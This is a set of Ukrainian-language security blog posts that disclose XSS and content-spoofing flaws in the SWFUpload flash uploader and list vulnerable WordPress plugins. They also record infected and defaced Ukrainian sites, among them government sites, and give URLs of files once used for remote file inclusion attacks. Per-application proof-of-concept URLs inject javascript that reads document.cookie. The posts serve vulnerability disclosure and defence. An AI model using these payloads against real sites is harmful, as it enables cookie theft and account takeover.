Websecurity - Веб безпека

Раніше я писав про Content Spoofing та Cross-Site Scripting уразливості в SWFUpload. Це дуже популярна флешка, що використовується на десятках мільйонів сайтів та в сотнях веб додатків (таких як WordPress, лише один цей веб додаток використовується більше ніж на 62 мільйонах сайтів за даними wordpress.com).

Торік я писав про іншу XSS дірку в SWFUpload і зазначав, що існує багато інших веб додатків з вразливим SWFUpload. Всі вони вразливі до цих нових уразливостей, за виключенням swfupload.swf, що постачається з WordPress починаючи з версії 3.3.2.

Є декілька імен файлів SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf і swfupload_f11.swf. Багато веб додатків включають декілька файлів SWFUpload. Не всі ці флешки вразливі до нивих дірок: swfupload_f8.swf і swfupload_f9.swf не вразливі (вони не мають функціоналу buttonText).

Тому з них вразливі наступні веб додатки (та багато інших веб додатків):

swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.

swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter, SentinelleOnAir.

swfupload_f11.swf - SentinelleOnAir.

А також вразливий InfoGlue (про XSS уразливість в ZeroClipboard.swf в якому я писав минулого місяця), що також містить SWFUpload.

В SWFUpload є Content Spoofing та Cross-Site Scripting уразливості, як я зазначив у вищезгаданому записі. Це приклади даної XSS уразливості в різних веб додатках.

Cross-Site Scripting (WASC-08):

WordPress:

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dotclear:

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InstantCMS:

http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Swfupload for Drupal:

http://site/js/libs/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InfoGlue:

Попередні XSS уразливості:

http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Нова XSS уразливість:

http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Вразливі всі веб додатки з SWFUpload (v2.2.0.1 та попередні версії). Вразливі WordPress 2.7 - 3.3.1, XenForo 1.0.0 - 1.1.2 та потенційно всі версії Dotclear, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, що раніше називався Standard Edition, і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter та SentinelleOnAir.

Для виправлення уразливості потрібно використати swfupload.swf з WordPress 3.3.2 та наступних версій (в цій флешці були виправлені як попередня XSS, так і ці CS та XSS уразливості).

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах CommentLuv, Ripe HD FLV Player та RLSWordPressSearch. Для котрих з’явилися експлоіти. CommentLuv - це плагін для розширення коментарів, Ripe HD FLV Player - це флеш відео плеєр, RLSWordPressSearch - це плагін для пошуку нерухомості на сайті.

• Cross-Site Scripting (XSS) Vulnerability in CommentLuv WordPress Plugin (деталі)
• WordPress Ripe HD FLV Player SQL Injection / Path Disclosure (деталі)
• WordPress RLSWordPressSearch SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://orient-simf.at.ua - інфекція була виявлена 08.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://gelion-dogs.kiev.ua - інфекція була виявлена 19.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://edinstvennaya.ua - інфекція була виявлена 03.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://zirki.info - інфекція була виявлена 18.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://tvoymalysh.com.ua - інфекція була виявлена 30.12.2012. Зараз сайт не входить до переліку підозрілих.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.ubozcn.gov.ua (хакером misafir) - 11.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.vn.ukrstat.gov.ua (хакером Hmei7) - 13.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://bcrda.gov.ua (хакером Sejeal) - 14.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://inform.kirovograd.ua (хакером TcKS!teAzrail)
• http://kebef.com (хакером CreativeTurk) - причому спочатку сайт 25.02.2013 був взломаний CreativeTurk, а зараз він вже взломаний BozQurd. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wysija Newsletters, Google Document Embedder та Gallery. Для котрих з’явилися експлоіти. Wysija Newsletters - це плагін для відправки інформаційних листів, Google Document Embedder - це плагін для включення в сайт документів з сервісів Гугла, Gallery - це плагін для створення галерей зображень.

• SQL Injection Vulnerability in Wysija Newsletters WordPress Plugin (деталі)
• WordPress Google Document Embedder Arbitrary File Disclosure (деталі)
• WordPress Gallery 3.8.3 Arbitrary File Read (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://vigos.com.ua - інфекція була виявлена 09.02.2013. Зараз сайт входить до переліку підозрілих.
• http://susanin.com - інфекція була виявлена 24.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://vigos.info - інфекція була виявлена 02.02.2013. Зараз сайт входить до переліку підозрілих.
• http://apartaments.od.ua - інфекція була виявлена 06.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://hot-girls.kiev.ua - інфекція була виявлена 12.01.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPressSearch, XML Sitemap Generator та NextGEN Gallery. Для котрих з’явилися експлоіти. WordPressSearch - це плагін для пошуку нерухомості, XML Sitemap Generator - це плагін для створення xml-файлів карти сайту, NextGEN Gallery - це плагін для створення галерей зображень.

• WordPressSearch plugin SQL Injection Vulnerability (деталі)
• XML Sitemap Generator 3.2.8 Code Injection (деталі)
• WordPress NextGEN Gallery 1.9.10 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти. Враховуючи, що після жовтня в моїх логах не було українських сайтів (тільки закордонні), що використовувалися для RFI атак, то я проаналізував більш старіші логи.

Похакані сайти в Уанеті:

• http://mpress.com.ua (невідомим хакером) - 04.2010
• http://pelet.at.ua (невідомим хакером) - 04.2010
• http://halupa.org.ua (невідомим хакером) - 05.2010
• http://tkj.at.ua (невідомим хакером) - 06.2010

Файли, що використовувалися для RFI атак (файли вже давно прибрані з сайтів):

http://mpress.com.ua/templates/zfxid1.txt
http://pelet.at.ua/bogel/id1.txt
http://halupa.org.ua/plugins/sh/id1.txt
http://halupa.org.ua/plugins/sh/idsuper.txt
http://tkj.at.ua/id1.txt

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://varva-rada.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ssd-koda.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://loko.pz.gov.ua (хакером Dr.SHA6H) - 11.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://mriya.pz.gov.ua (хакером Dr.SHA6H) - 11.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ivc.pz.gov.ua (хакерами з 1923Turk) - 15.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.bronedveri.lviv.ua (хакером Hmei7) - 17.10.2012, зараз сайт вже виправлений адмінами
• http://www.eridon.ua (хакером r00tturk) - 17.02.2013, зараз сайт вже виправлений адмінами
• http://raokriomrati.org (хакером Badi)
• http://www.capoeira.kiev.ua (хакером guba) - 05.02.2013, зараз сайт вже виправлений адмінами
• http://www.mizgir.com (хакером rEd X) - 01.02.2013, зараз сайт вже виправлений адмінами

Сайти varva-rada.gov.ua і ssd-koda.gov.ua вже були взломані торік.

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти. Враховуючи, що після жовтня в моїх логах не було українських сайтів (тільки закордонні), що використовувалися для RFI атак, то я проаналізував більш старіші логи.

Похакані сайти в Уанеті:

• http://www.stomatformula.com.ua (невідомим хакером) - 03.2010
• http://nova.kahovka.org.ua (невідомим хакером) - 03.2010
• http://www.rentitout.com.ua (невідомим хакером) - 03.2010
• http://chainik-art.com.ua (невідомим хакером) - 03.2010
• http://www.2kiev.com.ua (невідомим хакером) - 04.2010

Файли, що використовувалися для RFI атак (файли вже давно прибрані з сайтів):

http://www.stomatformula.com.ua/help/sh/id1.txt
http://nova.kahovka.org.ua/language/id1.txt
http://www.rentitout.com.ua/backups/ikhy1.txt
http://chainik-art.com.ua/administrator/components/com_explorer/id1.txt
http://www.2kiev.com.ua/images/id.png